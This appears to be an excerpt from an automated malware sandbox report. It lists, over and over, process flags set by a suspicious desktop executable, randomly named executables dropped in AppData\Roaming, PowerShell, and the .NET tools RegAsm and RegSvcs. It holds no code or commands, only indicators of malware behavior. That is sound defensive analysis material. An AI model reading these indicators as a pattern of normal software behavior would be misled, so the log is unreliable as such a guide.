Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
